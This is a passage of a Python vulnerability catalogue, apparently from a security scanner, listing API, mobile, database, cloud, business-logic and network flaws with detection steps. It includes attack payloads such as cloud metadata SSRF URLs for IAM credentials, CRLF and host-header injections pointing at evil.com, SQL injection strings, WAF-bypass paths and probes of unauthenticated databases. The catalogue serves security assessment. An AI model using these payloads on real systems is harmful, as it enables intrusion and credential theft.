                "CL.TE: Front-end uses CL, back-end uses TE",
                "Time the response — if delayed, smuggling confirmed",
            ],
        },
        "is_critical_when": "Can hijack other users' requests or bypass WAF",
        "impact": "Request hijacking, cache poisoning, WAF bypass.",
    },

    # API SECURITY VULNERABILITIES (30+)

    {
        "vuln_id": "API-001",
        "category": "api",
        "title": "Broken Object Level Authorization (BOLA)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-639",
        "owasp": "API1:2023 BOLA",
        "detection": {
            "method": "id_manipulation",
            "technique": [
                "Find API endpoint with object ID (GET /api/orders/{id})",
                "Change ID to another user's object ID",
                "Use different authentication session",
                "Check if data returned belongs to other user",
            ],
        },
        "is_critical_when": "Accessing financial/medical/PII data",
        "impact": "Mass data access across all users.",
    },
    {
        "vuln_id": "API-002",
        "category": "api",
        "title": "Broken Authentication (API Key/Token Exposure)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-522",
        "owasp": "API2:2023 Broken Authentication",
        "detection": {
            "method": "token_analysis",
            "techniques": [
                "Check for API keys in URL parameters (logged in proxies/access logs)",
                "Check JWT expiration (> 24h is concerning)",
                "Check if tokens are invalidated on password change",
                "Check if tokens work after logout",
            ],
        },
        "impact": "Token theft enables full account impersonation.",
    },
    {
        "vuln_id": "API-003",
        "category": "api",
        "title": "Broken Object Property Level Authorization (Mass Assignment)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-915",
        "owasp": "API3:2023 Object Property Level Auth",
        "detection": {
            "method": "property_injection",
            "technique": [
                "Capture normal update request (PUT /api/user)",
                "Add extra fields: role, isAdmin, balance, credits",
                "Check if server processes the extra fields",
            ],
        },
        "is_critical_when": "Role elevation or financial manipulation",
        "impact": "Privilege escalation via hidden parameter injection.",
    },
    {
        "vuln_id": "API-004",
        "category": "api",
        "title": "Unrestricted Resource Consumption",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-770",
        "owasp": "API4:2023 Unrestricted Resource Consumption",
        "detection": {
            "method": "resource_abuse",
            "technique": [
                "Send requests with large page_size parameter",
                "Upload very large files",
                "GraphQL: send deeply nested queries",
                "Check batch endpoints for unlimited items",
            ],
        },
        "impact": "Denial of service, excessive costs.",
    },
    {
        "vuln_id": "API-005",
        "category": "api",
        "title": "Broken Function Level Authorization",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-285",
        "owasp": "API5:2023 Broken Function Level Auth",
        "detection": {
            "method": "admin_endpoint_access",
            "technique": [
                "Replace /user/ with /admin/ in API path",
                "Try PUT/DELETE on endpoints that only support GET",
                "Access management APIs with regular user token",
            ],
        },
        "impact": "Unauthorized admin API access.",
    },
    {
        "vuln_id": "API-006",
        "category": "api",
        "title": "Server-Side Request Forgery (SSRF) via API",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-918",
        "owasp": "API6:2023 SSRF",
        "detection": {
            "method": "url_parameter_exploitation",
            "technique": [
                "Find API endpoints that accept URLs (webhooks, imports, previews)",
                "Inject internal network addresses",
                "Check cloud metadata endpoints",
                "Use DNS rebinding for internal access",
            ],
        },
        "impact": "Internal network mapping, credential theft.",
    },
    {
        "vuln_id": "API-007",
        "category": "api",
        "title": "Security Misconfiguration — Exposed API Documentation",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-16",
        "owasp": "API8:2023 Security Misconfiguration",
        "detection": {
            "method": "endpoint_discovery",
            "paths": [
                "/swagger-ui.html", "/swagger-ui/", "/swagger-ui/index.html",
                "/v2/api-docs", "/v3/api-docs", "/openapi.json", "/openapi.yaml",
                "/swagger.json", "/swagger.yaml", "/swagger-resources",
                "/graphql", "/graphiql", "/playground", "/voyager",
                "/api-docs", "/docs", "/redoc",
            ],
        },
        "is_critical_when": "Reveals internal-only endpoints with sensitive operations",
        "is_not_critical_when": "Only documents already-known public API",
        "impact": "Attack surface mapping, hidden endpoint discovery.",
    },
    {
        "vuln_id": "API-008",
        "category": "api",
        "title": "GraphQL Introspection Enabled in Production",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-200",
        "owasp": "API8:2023 Security Misconfiguration",
        "detection": {
            "method": "introspection_query",
            "payload": '{"query": "{ __schema { types { name fields { name type { name } } } } }"}',
            "validation": "If full schema returned with types and fields, confirmed.",
        },
        "is_critical_when": "Schema reveals admin mutations or sensitive types",
        "impact": "Complete API schema disclosure. Hidden mutation discovery.",
    },
    {
        "vuln_id": "API-009",
        "category": "api",
        "title": "Improper Inventory Management — Shadow API / Deprecated Version",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-1059",
        "owasp": "API9:2023 Improper Inventory Management",
        "detection": {
            "method": "version_enumeration",
            "technique": [
                "Try /api/v1, /api/v2, /api/v3 for each discovered endpoint",
                "Check if old versions lack security controls present in current",
                "Look for beta/staging/internal API paths in JS bundles",
            ],
        },
        "impact": "Old APIs may lack security patches and access controls.",
    },
    {
        "vuln_id": "API-010",
        "category": "api",
        "title": "Unsafe Consumption of APIs",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-918",
        "owasp": "API10:2023 Unsafe API Consumption",
        "detection": {
            "method": "response_manipulation",
            "technique": [
                "Intercept API responses from third-party services",
                "Inject XSS/SQLi payloads in fields the app trusts",
                "Check if webhook data is processed without validation",
            ],
        },
        "impact": "Injection through trusted third-party data.",
    },

    # MOBILE SECURITY — ANDROID (15+)

    {
        "vuln_id": "ANDROID-001",
        "category": "mobile_android",
        "title": "Insecure Data Storage (SharedPreferences / SQLite)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-922",
        "owasp_mobile": "M2:2024 Inadequate Supply Chain Security",
        "detection": {
            "method": "static_analysis",
            "technique": [
                "Decompile APK with jadx/apktool",
                "Search for SharedPreferences storing sensitive data (tokens, passwords)",
                "Check SQLite databases for plaintext credentials",
                "Check if encryption used (MODE_PRIVATE is NOT encryption)",
            ],
            "tools": ["jadx", "apktool", "dex2jar", "adb"],
        },
        "is_critical_when": "Auth tokens or credentials stored in plaintext",
        "impact": "Credential theft via physical access or backup extraction.",
        "remediation": "Use Android Keystore for sensitive data. Encrypt SQLite with SQLCipher.",
    },
    {
        "vuln_id": "ANDROID-002",
        "category": "mobile_android",
        "title": "Exported Components (Activity/Service/Receiver/Provider)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-926",
        "owasp_mobile": "M1:2024 Improper Credential Usage",
        "detection": {
            "method": "manifest_analysis",
            "technique": [
                "Parse AndroidManifest.xml for exported=true components",
                "Check for intent-filter without permission requirements",
                "Test: adb shell am start -n pkg/activity",
                "Check Content Providers for SQL injection",
            ],
        },
        "is_critical_when": "Exported component gives access to sensitive data/actions",
        "impact": "Malicious apps can invoke sensitive functionality.",
    },
    {
        "vuln_id": "ANDROID-003",
        "category": "mobile_android",
        "title": "Insecure Network Communication",
        "severity": "high",
        "cvss_score": 7.4,
        "cwe": "CWE-319",
        "owasp_mobile": "M5:2024 Insecure Communication",
        "detection": {
            "method": "traffic_analysis",
            "technique": [
                "Check network_security_config.xml for cleartext traffic",
                "Look for android:usesCleartextTraffic='true'",
                "Check for custom TrustManagers that accept all certs",
                "Check for certificate pinning implementation",
                "Proxy traffic with Burp/mitmproxy",
            ],
        },
        "is_critical_when": "Auth tokens sent over cleartext HTTP",
        "impact": "MITM attack. Credential interception on public WiFi.",
    },
    {
        "vuln_id": "ANDROID-004",
        "category": "mobile_android",
        "title": "Hardcoded Secrets in APK",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-798",
        "detection": {
            "method": "static_analysis",
            "technique": [
                "Decompile with jadx, search for API keys, passwords, secrets",
                "Check strings.xml, build.gradle, BuildConfig",
                "Search for AWS_ACCESS_KEY, firebase, stripe, google_maps_key",
                "Check native libraries (.so files) with strings command",
            ],
            "patterns": [
                r"AIza[a-zA-Z0-9_-]{35}",
                r"AKIA[A-Z0-9]{16}",
                r"sk_live_[a-zA-Z0-9]{24,}",
                r"-----BEGIN (RSA|EC|PRIVATE) KEY-----",
                r"firebase.*\"[A-Za-z0-9-]+\.firebaseio\.com\"",
            ],
        },
        "is_critical_when": "Secret key has write/admin permissions AND is still active",
        "is_not_critical_when": "Read-only public API key (Google Maps public key) = Informational",
        "impact": "API abuse, cloud resource compromise.",
    },
    {
        "vuln_id": "ANDROID-005",
        "category": "mobile_android",
        "title": "Insufficient Certificate Pinning",
        "severity": "medium",
        "cvss_score": 5.9,
        "cwe": "CWE-295",
        "detection": {
            "method": "proxy_interception",
            "technique": [
                "Install proxy CA cert on device",
                "Check if app accepts the proxy certificate",
                "If traffic interceptable → no pinning or pinning bypassed",
                "Check for OkHttp CertificatePinner usage",
            ],
        },
        "impact": "MITM attacks possible. Token interception.",
    },
    {
        "vuln_id": "ANDROID-006",
        "category": "mobile_android",
        "title": "Insecure WebView Implementation",
        "severity": "high",
        "cvss_score": 8.1,
        "cwe": "CWE-749",
        "detection": {
            "method": "webview_analysis",
            "technique": [
                "Check for setJavaScriptEnabled(true) with addJavascriptInterface",
                "Check for file:// scheme access (setAllowFileAccess)",
                "Check if WebView loads user-controlled URLs",
                "Test for XSS in WebView context",
            ],
        },
        "is_critical_when": "JavaScript bridge exposes native methods to web content",
        "impact": "RCE via JavaScript-to-native bridge exploitation.",
    },
    {
        "vuln_id": "ANDROID-007",
        "category": "mobile_android",
        "title": "Deeplink / Intent URI Manipulation",
        "severity": "medium",
        "cvss_score": 6.5,
        "cwe": "CWE-927",
        "detection": {
            "method": "deeplink_analysis",
            "technique": [
                "Extract deeplink schemes from Manifest",
                "Craft malicious deeplinks that navigate to sensitive screens",
                "Check for deeplink parameter injection into WebView",
                "Test: adb shell am start -a android.intent.action.VIEW -d 'scheme://path?param=evil'",
            ],
        },
        "impact": "Unauthorized functionality access via crafted URIs.",
    },
    {
        "vuln_id": "ANDROID-008",
        "category": "mobile_android",
        "title": "Backup Enabled (android:allowBackup=true)",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-922",
        "detection": {
            "method": "manifest_analysis",
            "technique": ["Check AndroidManifest.xml for android:allowBackup='true'"],
        },
        "impact": "App data extractable via ADB backup. Credentials leakage.",
    },
    {
        "vuln_id": "ANDROID-009",
        "category": "mobile_android",
        "title": "Debug Mode Enabled in Production",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-489",
        "detection": {
            "method": "manifest_analysis",
            "technique": ["Check for android:debuggable='true' in AndroidManifest.xml"],
        },
        "is_critical_when": "In production APK downloaded from Play Store",
        "impact": "Full app debugging possible. Memory/data extraction.",
    },
    {
        "vuln_id": "ANDROID-010",
        "category": "mobile_android",
        "title": "Content Provider SQL Injection",
        "severity": "critical",
        "cvss_score": 9.1,
        "cwe": "CWE-89",
        "detection": {
            "method": "provider_query_injection",
            "technique": [
                "Find exported ContentProviders in Manifest",
                "Query with projection/selection containing SQL payloads",
                "content://authority/table' OR '1'='1",
            ],
        },
        "impact": "Database access through content provider SQL injection.",
    },

    # MOBILE SECURITY — iOS (15+)

    {
        "vuln_id": "IOS-001",
        "category": "mobile_ios",
        "title": "Insecure Data Storage (Keychain Misconfiguration)",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-922",
        "owasp_mobile": "M2:2024 Inadequate Supply Chain Security",
        "detection": {
            "method": "runtime_analysis",
            "technique": [
                "Check Keychain accessibility level (kSecAttrAccessibleAlways is bad)",
                "Dump Keychain using objection or keychain-dumper on jailbroken device",
                "Check NSUserDefaults for sensitive data",
                "Check CoreData/SQLite databases for plaintext",
            ],
            "tools": ["objection", "frida", "keychain-dumper", "class-dump"],
        },
        "impact": "Credential theft via device backup or physical access.",
    },
    {
        "vuln_id": "IOS-002",
        "category": "mobile_ios",
        "title": "Hardcoded Secrets in IPA",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-798",
        "detection": {
            "method": "binary_analysis",
            "technique": [
                "Extract IPA (rename to .zip, extract)",
                "Run strings on binary/frameworks",
                "Use class-dump for Objective-C headers",
                "Search for API keys, URLs, credentials",
                "Check Info.plist for sensitive configuration",
            ],
        },
        "impact": "API key abuse, backend service compromise.",
    },
    {
        "vuln_id": "IOS-003",
        "category": "mobile_ios",
        "title": "Transport Security (ATS) Bypass",
        "severity": "high",
        "cvss_score": 7.4,
        "cwe": "CWE-319",
        "detection": {
            "method": "plist_analysis",
            "technique": [
                "Check Info.plist for NSAppTransportSecurity exceptions",
                "NSAllowsArbitraryLoads = true → all cleartext allowed",
                "Check specific domain exceptions",
            ],
        },
        "impact": "MITM attacks on network traffic.",
    },
    {
        "vuln_id": "IOS-004",
        "category": "mobile_ios",
        "title": "URL Scheme Hijacking",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-927",
        "detection": {
            "method": "scheme_analysis",
            "technique": [
                "Check Info.plist for CFBundleURLSchemes",
                "Check for Universal Links (apple-app-site-association)",
                "Test if another app can register same URL scheme",
                "Check for sensitive data in URL scheme parameters",
            ],
        },
        "impact": "OAuth token theft, phishing via scheme hijacking.",
    },
    {
        "vuln_id": "IOS-005",
        "category": "mobile_ios",
        "title": "Jailbreak Detection Bypass",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-693",
        "detection": {
            "method": "runtime_bypass",
            "technique": [
                "Use objection/frida to hook jailbreak detection methods",
                "Check for common detection paths (/Applications/Cydia.app)",
                "Bypass using Liberty Lite or similar tools",
            ],
        },
        "impact": "App runs on compromised device, enabling runtime manipulation.",
    },
    {
        "vuln_id": "IOS-006",
        "category": "mobile_ios",
        "title": "Clipboard Data Leakage",
        "severity": "low",
        "cvss_score": 3.3,
        "cwe": "CWE-200",
        "detection": {
            "method": "runtime_monitoring",
            "technique": [
                "Monitor UIPasteboard for sensitive data",
                "Check if password fields allow copying",
                "Check clipboard persistence after app close",
            ],
        },
        "impact": "Sensitive data accessible to other apps via clipboard.",
    },
    {
        "vuln_id": "IOS-007",
        "category": "mobile_ios",
        "title": "Insecure WKWebView Implementation",
        "severity": "high",
        "cvss_score": 8.1,
        "cwe": "CWE-749",
        "detection": {
            "method": "webview_analysis",
            "technique": [
                "Check for WKScriptMessageHandler exposing native functions",
                "Check if WebView loads arbitrary URLs",
                "Test JS-to-native bridge for injection",
            ],
        },
        "impact": "Native code execution via WebView bridge exploitation.",
    },

    # DATABASE SECURITY (20+)

    {
        "vuln_id": "DB-001",
        "category": "database",
        "title": "Exposed Database Port (No Authentication)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "port_probe",
            "ports": {
                "mysql": 3306, "postgres": 5432, "mongodb": 27017,
                "redis": 6379, "elasticsearch": 9200, "couchdb": 5984,
                "cassandra": 9042, "mssql": 1433, "oracle": 1521,
                "memcached": 11211, "neo4j": 7474, "influxdb": 8086,
            },
            "technique": [
                "Connect to port with no credentials",
                "If connection successful and data accessible → critical",
            ],
        },
        "is_critical_when": "Database accessible without authentication from internet",
        "impact": "Complete data breach. Data destruction. Ransomware.",
    },
    {
        "vuln_id": "DB-002",
        "category": "database",
        "title": "MongoDB No Auth / Default Config",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "mongodb_probe",
            "technique": [
                "Connect: mongosh mongodb://target:27017",
                "Run: show dbs",
                "If databases listed without auth → critical",
            ],
        },
        "impact": "Full database access. 70K+ exposed instances globally.",
    },
    {
        "vuln_id": "DB-003",
        "category": "database",
        "title": "Redis No Auth / Command Execution",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "redis_probe",
            "technique": [
                "Connect: redis-cli -h target",
                "Run: INFO, KEYS *, CONFIG GET *",
                "Check for RCE via Lua scripting: EVAL",
            ],
        },
        "impact": "Data theft, RCE via Lua or module loading.",
    },
    {
        "vuln_id": "DB-004",
        "category": "database",
        "title": "Elasticsearch No Auth (Open Cluster)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "elasticsearch_probe",
            "technique": [
                "GET http://target:9200/",
                "GET http://target:9200/_cat/indices",
                "GET http://target:9200/_search?q=*",
            ],
        },
        "impact": "Full index access. PII exposure. Data deletion.",
    },
    {
        "vuln_id": "DB-005",
        "category": "database",
        "title": "CouchDB Admin Party (No Auth)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "couchdb_probe",
            "technique": [
                "GET http://target:5984/",
                "GET http://target:5984/_all_dbs",
                "GET http://target:5984/_utils (Fauxton UI)",
            ],
        },
        "impact": "Full database access via HTTP API.",
    },
    {
        "vuln_id": "DB-006",
        "category": "database",
        "title": "Exposed phpMyAdmin / Adminer",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-425",
        "detection": {
            "method": "web_panel_discovery",
            "paths": [
                "/phpmyadmin/", "/pma/", "/mysql/", "/adminer.php",
                "/adminer/", "/dbadmin/", "/db/", "/phpMyAdmin/",
            ],
        },
        "impact": "Direct database management interface access.",
    },
    {
        "vuln_id": "DB-007",
        "category": "database",
        "title": "Database Backup File Exposure",
        "severity": "critical",
        "cvss_score": 9.1,
        "cwe": "CWE-538",
        "detection": {
            "method": "file_discovery",
            "paths": [
                "/backup.sql", "/dump.sql", "/db.sql", "/database.sql",
                "/backup.sql.gz", "/db_backup.tar.gz", "/.sql",
                "/data.json", "/export.csv",
            ],
        },
        "is_critical_when": "Contains user credentials or PII",
        "impact": "Complete database dump with all user data.",
    },

    # INFRASTRUCTURE & CLOUD (25+)

    {
        "vuln_id": "INFRA-001",
        "category": "infrastructure",
        "title": "Spring Boot Actuator Exposure",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-200",
        "detection": {
            "method": "endpoint_discovery",
            "paths": [
                "/actuator", "/actuator/health", "/actuator/info",
                "/actuator/env", "/actuator/configprops", "/actuator/beans",
                "/actuator/mappings", "/actuator/metrics", "/actuator/prometheus",
                "/actuator/threaddump", "/actuator/heapdump", "/actuator/loggers",
            ],
            "bypass_techniques": [
                "Trailing slash: /actuator/health/",
                "Double slash: //actuator/health",
                "Path traversal: /actuator/./health",
                "Case variations: /Actuator/Health",
                "URL encoding: /actuator%2fhealth",
            ],
        },
        "is_critical_when": "/env exposes credentials, /heapdump contains secrets, /prometheus has auth tokens",
        "is_not_critical_when": "Only /health accessible = Low",
        "impact": "Environment variables, heap dumps with credentials, route mapping.",
    },
    {
        "vuln_id": "INFRA-002",
        "category": "infrastructure",
        "title": "Exposed .env / Configuration Files",
        "severity": "critical",
        "cvss_score": 9.1,
        "cwe": "CWE-538",
        "detection": {
            "method": "file_discovery",
            "paths": [
                "/.env", "/.env.production", "/.env.local", "/.env.development",
                "/config.json", "/config.yaml", "/config.yml", "/application.yml",
                "/application.properties", "/appsettings.json", "/wp-config.php",
                "/.docker-compose.yml", "/docker-compose.yml",
            ],
        },
        "is_critical_when": "Contains database credentials, API keys, or auth secrets",
        "impact": "Complete credential exposure. Database and API access.",
    },
    {
        "vuln_id": "INFRA-003",
        "category": "infrastructure",
        "title": "Exposed .git Directory",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-538",
        "detection": {
            "method": "git_probe",
            "technique": [
                "GET /.git/HEAD → should return 'ref: refs/heads/main'",
                "GET /.git/config → reveals origin remote URL",
                "Use git-dumper tool to download full repository",
            ],
        },
        "is_critical_when": "Full source code extraction possible",
        "impact": "Source code disclosure. Credential history in commits.",
    },
    {
        "vuln_id": "INFRA-004",
        "category": "infrastructure",
        "title": "Kubernetes Dashboard / API Exposure",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "endpoint_discovery",
            "paths": [
                "/api/v1", "/apis", "/healthz", "/metrics",
                "/api/v1/pods", "/api/v1/secrets", "/api/v1/namespaces",
            ],
            "technique": ["Check for anonymous auth on K8s API"],
        },
        "is_critical_when": "Secrets or pod listing accessible without auth",
        "impact": "Container escape, secret theft, cluster takeover.",
    },
    {
        "vuln_id": "INFRA-005",
        "category": "infrastructure",
        "title": "Docker API Exposure",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-306",
        "detection": {
            "method": "api_probe",
            "technique": [
                "GET http://target:2375/containers/json",
                "GET http://target:2375/images/json",
                "GET http://target:2376/info",
            ],
        },
        "impact": "Full container management. Host filesystem access. RCE.",
    },
    {
        "vuln_id": "INFRA-006",
        "category": "infrastructure",
        "title": "AWS S3 Bucket Misconfiguration",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-732",
        "detection": {
            "method": "s3_probe",
            "technique": [
                "Check bucket listing: GET https://bucket.s3.amazonaws.com/",
                "Check bucket ACL: GET ?acl",
                "Try PUT to test write access",
            ],
        },
        "is_critical_when": "PII/credentials in bucket OR write access enabled",
        "impact": "Data exposure, data tampering, malware hosting.",
    },
    {
        "vuln_id": "INFRA-007",
        "category": "infrastructure",
        "title": "Subdomain Takeover",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-913",
        "detection": {
            "method": "cname_resolution",
            "technique": [
                "Check DNS CNAME for dangling references",
                "Match CNAME target against takeover fingerprints",
                "35+ services: GitHub Pages, Heroku, S3, Azure, Netlify, etc.",
            ],
            "fingerprints": {
                "github": "There isn't a GitHub Pages site here",
                "heroku": "No such app",
                "s3": "NoSuchBucket",
                "azure": "404 Web Site not found",
                "shopify": "Sorry, this shop is currently unavailable",
            },
        },
        "is_critical_when": "Takeover achievable (can claim the dangling resource)",
        "impact": "Phishing, cookie theft, XSS via controlled subdomain.",
    },
    {
        "vuln_id": "INFRA-008",
        "category": "infrastructure",
        "title": "Source Map Files Exposed",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-540",
        "detection": {
            "method": "sourcemap_probe",
            "technique": [
                "Find JS bundle URLs in page source",
                "Append .map to each URL",
                "If source map returned → full source code disclosed",
            ],
        },
        "is_critical_when": "Source maps contain credentials, API keys, or internal paths",
        "impact": "Complete client-side source code disclosure.",
    },
    {
        "vuln_id": "INFRA-009",
        "category": "infrastructure",
        "title": "WAF Bypass via Path Normalization",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-436",
        "detection": {
            "method": "path_manipulation",
            "techniques": [
                "Trailing slash: /blocked-path → /blocked-path/",
                "Double slash: //blocked-path",
                "Path traversal: /./blocked-path or /blocked-path/./",
                "URL encoding: /blocked%2dpath",
                "Case variation: /BLOCKED-PATH",
                "Semicolon: /;/blocked-path",
                "Dot segment: /blocked-path/../blocked-path",
            ],
            "validation": "Compare status codes: without bypass = 403, with bypass = 200",
        },
        "is_critical_when": "Bypass exposes sensitive data (credentials, PII)",
        "impact": "WAF rendered ineffective. Protected endpoints accessible.",
    },
    {
        "vuln_id": "INFRA-010",
        "category": "infrastructure",
        "title": "Exposed Admin / Management Panels",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-425",
        "detection": {
            "method": "panel_discovery",
            "paths": [
                "/admin", "/admin/", "/administrator", "/wp-admin",
                "/console", "/management", "/manager", "/dashboard",
                "/grafana", "/kibana", "/jenkins", "/portainer",
                "/traefik", "/prometheus", "/alertmanager",
            ],
        },
        "impact": "Infrastructure management access. Configuration changes.",
    },
    {
        "vuln_id": "INFRA-011",
        "category": "infrastructure",
        "title": "Cloud Metadata SSRF (169.254.169.254)",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-918",
        "detection": {
            "method": "metadata_ssrf",
            "urls": {
                "aws": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                "gcp": "http://metadata.google.internal/computeMetadata/v1/",
                "azure": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
                "digitalocean": "http://169.254.169.254/metadata/v1/",
            },
        },
        "is_critical_when": "Cloud IAM credentials retrieved",
        "impact": "Cloud account compromise. Lateral movement to all cloud resources.",
    },
    {
        "vuln_id": "INFRA-012",
        "category": "infrastructure",
        "title": "Exposed Prometheus / Grafana Metrics",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-200",
        "detection": {
            "method": "endpoint_discovery",
            "paths": ["/metrics", "/prometheus", "/grafana"],
        },
        "is_critical_when": "Metrics contain auth tokens, internal URLs, or PII",
        "impact": "Internal architecture disclosure. Performance data leakage.",
    },

    # BUSINESS LOGIC VULNERABILITIES (15+)

    {
        "vuln_id": "BIZ-001",
        "category": "business_logic",
        "title": "Price Manipulation",
        "severity": "critical",
        "cvss_score": 9.1,
        "cwe": "CWE-472",
        "detection": {
            "method": "parameter_tampering",
            "technique": [
                "Intercept checkout/payment request",
                "Modify price, quantity, or discount parameters",
                "Change price to 0, -1, or 0.01",
                "Modify currency code",
                "Apply non-existent coupon codes",
            ],
        },
        "is_critical_when": "Order processed at manipulated price",
        "impact": "Financial loss. Free or discounted purchases.",
    },
    {
        "vuln_id": "BIZ-002",
        "category": "business_logic",
        "title": "Coupon/Referral Code Abuse",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-799",
        "detection": {
            "method": "logic_abuse",
            "technique": [
                "Apply single-use coupon multiple times (race condition)",
                "Apply coupon after checkout initiated",
                "Stack multiple coupons beyond intended limit",
                "Self-referral loop",
            ],
        },
        "impact": "Unlimited discounts. Revenue loss.",
    },
    {
        "vuln_id": "BIZ-003",
        "category": "business_logic",
        "title": "Insufficient Withdrawal/Transfer Validation",
        "severity": "critical",
        "cvss_score": 9.8,
        "cwe": "CWE-472",
        "detection": {
            "method": "balance_manipulation",
            "technique": [
                "Transfer more than balance (negative balance)",
                "Send negative amount (reverse transfer)",
                "Race condition on simultaneous withdrawals",
                "Integer overflow on large amounts",
            ],
        },
        "is_critical_when": "Financial manipulation demonstrated",
        "impact": "Direct financial theft or balance manipulation.",
    },
    {
        "vuln_id": "BIZ-004",
        "category": "business_logic",
        "title": "Email Verification Bypass",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-283",
        "detection": {
            "method": "flow_bypass",
            "technique": [
                "Register account, skip email verification link",
                "Try accessing authenticated features",
                "Manipulate response to show 'verified' status",
            ],
        },
        "impact": "Account creation without email ownership verification.",
    },
    {
        "vuln_id": "BIZ-005",
        "category": "business_logic",
        "title": "Vote/Like/Review Manipulation",
        "severity": "low",
        "cvss_score": 3.7,
        "cwe": "CWE-799",
        "detection": {
            "method": "repeat_action",
            "technique": [
                "Repeat vote/like request multiple times",
                "Delete and re-submit review",
                "Manipulate vote count parameter",
            ],
        },
        "impact": "Manipulation of ratings and public perception.",
    },

    # NETWORK & PROTOCOL (10+)

    {
        "vuln_id": "NET-001",
        "category": "network",
        "title": "DNS Zone Transfer (AXFR)",
        "severity": "medium",
        "cvss_score": 5.3,
        "cwe": "CWE-200",
        "detection": {
            "method": "dns_axfr",
            "technique": ["dig AXFR @ns.target.com target.com"],
        },
        "impact": "Complete DNS zone disclosure. Internal hostname mapping.",
    },
    {
        "vuln_id": "NET-002",
        "category": "network",
        "title": "Open Mail Relay",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-306",
        "detection": {
            "method": "smtp_probe",
            "technique": [
                "Connect to SMTP port 25/587",
                "Send HELO, MAIL FROM, RCPT TO with external address",
                "If accepted → open relay",
            ],
        },
        "impact": "Spam sending, phishing from company domain.",
    },
    {
        "vuln_id": "NET-003",
        "category": "network",
        "title": "Dangling DNS / CNAME to Non-Existent Resource",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-913",
        "detection": {
            "method": "dns_resolution",
            "technique": [
                "Resolve all subdomains",
                "Check CNAMEs pointing to non-existent resources",
                "Verify resource can be claimed",
            ],
        },
        "impact": "Subdomain takeover. Phishing. Cookie theft.",
    },

    # MISCELLANEOUS / CROSS-CUTTING

    {
        "vuln_id": "MISC-001",
        "category": "misconfiguration",
        "title": "HTTP Request Smuggling via Cloudflare/CDN",
        "severity": "critical",
        "cvss_score": 9.1,
        "cwe": "CWE-444",
        "detection": {
            "method": "cl_te_differential",
            "technique": [
                "Send request with conflicting Content-Length and Transfer-Encoding",
                "Check CDN/WAF handling vs origin server handling",
            ],
        },
        "impact": "Request hijacking, cache poisoning, WAF bypass.",
    },
    {
        "vuln_id": "MISC-002",
        "category": "misconfiguration",
        "title": "Web Cache Poisoning",
        "severity": "high",
        "cvss_score": 7.5,
        "cwe": "CWE-444",
        "detection": {
            "method": "cache_key_analysis",
            "technique": [
                "Identify unkeyed headers (X-Forwarded-Host, X-Original-URL)",
                "Inject payload via unkeyed header",
                "Check if poisoned response served to other users",
            ],
        },
        "impact": "XSS via cache, redirect all users to malicious site.",
    },
    {
        "vuln_id": "MISC-003",
        "category": "misconfiguration",
        "title": "CRLF Injection / HTTP Response Splitting",
        "severity": "medium",
        "cvss_score": 6.1,
        "cwe": "CWE-93",
        "detection": {
            "method": "header_injection",
            "payloads": [
                "%0d%0aSet-Cookie:%20evil=1",
                "%0d%0aLocation:%20https://evil.com",
                "\\r\\nX-Injected: true",
            ],
        },
        "impact": "Cookie injection, redirect, XSS via header injection.",
    },
    {
        "vuln_id": "MISC-004",
        "category": "misconfiguration",
        "title": "Host Header Injection",
        "severity": "medium",
        "cvss_score": 6.1,
        "cwe": "CWE-644",
        "detection": {
            "method": "host_manipulation",
            "technique": [
                "Change Host header to evil.com in password reset request",
                "Check if password reset link uses injected host",
                "Check X-Forwarded-Host injection",
            ],
        },
        "is_critical_when": "Password reset link domain changed → account takeover",
        "impact": "Password reset poisoning, cache poisoning.",
    },
    {
        "vuln_id": "MISC-005",
        "category": "misconfiguration",
        "title": "Clickjacking (Missing X-Frame-Options)",
        "severity": "low",
        "cvss_score": 4.3,
        "cwe": "CWE-1021",
